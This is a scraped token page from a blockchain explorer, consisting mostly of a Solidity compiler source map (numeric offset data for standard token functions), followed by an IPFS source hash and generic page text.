6:377::-;4161:10;10609:4;10653:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;10653:34:0;;;;;;;;;;10706:35;;;;10698:85;;;;-1:-1:-1;;;10698:85:0;;4787:2:1;10698:85:0;;;4769:21:1;4826:2;4806:18;;;4799:30;4865:34;4845:18;;;4838:62;-1:-1:-1;;;4916:18:1;;;4909:35;4961:19;;10698:85:0;4585:401:1;10698:85:0;10794:67;4161:10;10817:7;10826:34;10845:15;10826:16;:34;:::i;10794:67::-;-1:-1:-1;10881:4:0;;10516:377;-1:-1:-1;;;10516:377:0:o;9344:175::-;9430:4;9447:42;4161:10;9471:9;9482:6;9447:9;:42::i;12715:337::-;12865:8;;-1:-1:-1;;;;;12865:8:0;12853:10;:20;12845:29;;;;;;12876:17;12896:16;12910:1;12896:2;:16;:::i;:::-;12926:8;;-1:-1:-1;12876:36:0;-1:-1:-1;12876:36:0;13002:8;12980:19;12991:8;12980;:19;:::i;:::-;:30;;;;:::i;:::-;12979:44;;;;:::i;:::-;-1:-1:-1;;;;;12956:20:0;;;;;;;:9;:20;;;;;:67;;;;-1:-1:-1;;;;;12715:337:0:o;6375:244::-;5654:10;5643:7;5469;5496:6;-1:-1:-1;;;;;5496:6:0;;5423:87;5643:7;-1:-1:-1;;;;;5643:21:0;;5635:66;;;;-1:-1:-1;;;5635:66:0;;4426:2:1;5635:66:0;;;4408:21:1;;;4445:18;;;4438:30;4504:34;4484:18;;;4477:62;4556:18;;5635:66:0;4224:356:1;5635:66:0;-1:-1:-1;;;;;6464:22:0;::::1;6456:73;;;::::0;-1:-1:-1;;;6456:73:0;;6740:2:1;6456:73:0::1;::::0;::::1;6722:21:1::0;6779:2;6759:18;;;6752:30;6818:34;6798:18;;;6791:62;-1:-1:-1;;;6869:18:1;;;6862:36;6915:19;;6456:73:0::1;6538:402:1::0;6456:73:0::1;6566:6;::::0;;6545:38:::1;::::0;-1:-1:-1;;;;;6545:38:0;;::::1;::::0;6566:6;::::1;::::0;6545:38:::1;::::0;::::1;6594:6;:17:::0;;-1:-1:-1;;;;;;6594:17:0::1;-1:-1:-1::0;;;;;6594:17:0;;;::::1;::::0;;;::::1;::::0;;6375:244::o;12361:346::-;-1:-1:-1;;;;;12463:19:0;;12455:68;;;;-1:-1:-1;;;12455:68:0;;7147:2:1;12455:68:0;;;7129:21:1;7186:2;7166:18;;;7159:30;7225:34;7205:18;;;7198:62;-1:-1:-1;;;7276:18:1;;;7269:34;7320:19;;12455:68:0;6945:400:1;12455:68:0;-1:-1:-1;;;;;12542:21:0;;12534:68;;;;-1:-1:-1;;;12534:68:0;;7552:2:1;12534:68:0;;;7534:21:1;7591:2;7571:18;;;7564:30;7630:34;7610:18;;;7603:62;-1:-1:-1;;;7681:18:1;;;7674:32;7723:19;;12534:68:0;7350:398:1;12534:68:0;-1:-1:-1;;;;;12615:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;12667:32;;1342:25:1;;;12667:32:0;;1315:18:1;12667:32:0;;;;;;;12361:346;;;:::o;10901:604::-;-1:-1:-1;;;;;11007:20:0;;10999:70;;;;-1:-1:-1;;;10999:70:0;;7955:2:1;10999:70:0;;;7937:21:1;7994:2;7974:18;;;7967:30;8033:34;8013:18;;;8006:62;-1:-1:-1;;;8084:18:1;;;8077:35;8129:19;;10999:70:0;7753:401:1;10999:70:0;-1:-1:-1;;;;;11088:23:0;;11080:71;;;;-1:-1:-1;;;11080:71:0;;8361:2:1;11080:71:0;;;8343:21:1;8400:2;8380:18;;;8373:30;8439:34;8419:18;;;8412:62;-1:-1:-1;;;8490:18:1;;;8483:33;8533:19;;11080:71:0;8159:399:1;11080:71:0;-1:-1:-1;;;;;11248:17:0;;11224:21;11248:17;;;:9;:17;;;;;;11284:23;;;;11276:74;;;;-1:-1:-1;;;11276:74:0;;8765:2:1;11276:74:0;;;8747:21:1;8804:2;8784:18;;;8777:30;8843:34;8823:18;;;8816:62;-1:-1:-1;;;8894:18:1;;;8887:36;8940:19;;11276:74:0;8563:402:1;11276:74:0;11381:22;11397:6;11381:13;:22;:::i;:::-;-1:-1:-1;;;;;11361:17:0;;;;;;;:9;:17;;;;;;:42;;;;11414:20;;;;;;;;:30;;11438:6;;11361:17;11414:30;;11438:6;;11414:30;:::i;:::-;;;;;;;;11479:9;-1:-1:-1;;;;;11462:35:0;11471:6;-1:-1:-1;;;;;11462:35:0;;11490:6;11462:35;;;;1342:25:1;;1330:2;1315:18;;1196:177;11462:35:0;;;;;;;;10988:517;10901:604;;;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:186::-;1959:6;2012:2;2000:9;1991:7;1987:23;1983:32;1980:52;;;2028:1;2025;2018:12;1980:52;2051:29;2070:9;2051:29;:::i;:::-;2041:39;1900:186;-1:-1:-1;;;1900:186:1:o;2299:466::-;2394:6;2402;2410;2418;2426;2479:3;2467:9;2458:7;2454:23;2450:33;2447:53;;;2496:1;2493;2486:12;2447:53;2519:29;2538:9;2519:29;:::i;:::-;2509:39;;2567:38;2601:2;2590:9;2586:18;2567:38;:::i;:::-;2299:466;;2557:48;;-1:-1:-1;;;;2652:2:1;2637:18;;2624:32;;2703:2;2688:18;;2675:32;;2754:3;2739:19;;;2726:33;;-1:-1:-1;2299:466:1:o;2770:260::-;2838:6;2846;2899:2;2887:9;2878:7;2874:23;2870:32;2867:52;;;2915:1;2912;2905:12;2867:52;2938:29;2957:9;2938:29;:::i;:::-;2928:39;;2986:38;3020:2;3009:9;3005:18;2986:38;:::i;:::-;2976:48;;2770:260;;;;;:::o;3035:380::-;3114:1;3110:12;;;;3157;;;3178:61;;3232:4;3224:6;3220:17;3210:27;;3178:61;3285:2;3277:6;3274:14;3254:18;3251:38;3248:161;;3331:10;3326:3;3322:20;3319:1;3312:31;3366:4;3363:1;3356:15;3394:4;3391:1;3384:15;3248:161;;3035:380;;;:::o;3829:127::-;3890:10;3885:3;3881:20;3878:1;3871:31;3921:4;3918:1;3911:15;3945:4;3942:1;3935:15;3961:128;4028:9;;;4049:11;;;4046:37;;;4063:18;;:::i;4094:125::-;4159:9;;;4180:10;;;4177:36;;;4193:18;;:::i;4991:422::-;5080:1;5123:5;5080:1;5137:270;5158:7;5148:8;5145:21;5137:270;;;5217:4;5213:1;5209:6;5205:17;5199:4;5196:27;5193:53;;;5226:18;;:::i;:::-;5276:7;5266:8;5262:22;5259:55;;;5296:16;;;;5259:55;5375:22;;;;5335:15;;;;5137:270;;;5141:3;4991:422;;;;;:::o;5418:806::-;5467:5;5497:8;5487:80;;-1:-1:-1;5538:1:1;5552:5;;5487:80;5586:4;5576:76;;-1:-1:-1;5623:1:1;5637:5;;5576:76;5668:4;5686:1;5681:59;;;;5754:1;5749:130;;;;5661:218;;5681:59;5711:1;5702:10;;5725:5;;;5749:130;5786:3;5776:8;5773:17;5770:43;;;5793:18;;:::i;:::-;-1:-1:-1;;5849:1:1;5835:16;;5864:5;;5661:218;;5963:2;5953:8;5950:16;5944:3;5938:4;5935:13;5931:36;5925:2;5915:8;5912:16;5907:2;5901:4;5898:12;5894:35;5891:77;5888:159;;;-1:-1:-1;6000:19:1;;;6032:5;;5888:159;6079:34;6104:8;6098:4;6079:34;:::i;:::-;6149:6;6145:1;6141:6;6137:19;6128:7;6125:32;6122:58;;;6160:18;;:::i;:::-;6198:20;;5418:806;-1:-1:-1;;;5418:806:1:o;6229:131::-;6289:5;6318:36;6345:8;6339:4;6318:36;:::i;6365:168::-;6438:9;;;6469;;6486:15;;;6480:22;;6466:37;6456:71;;6507:18;;:::i
Swarm Source
ipfs://d210f0e663c6c24692b9a4f190565107e5f62c2b02cfcb1e559ba50f685891fa
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.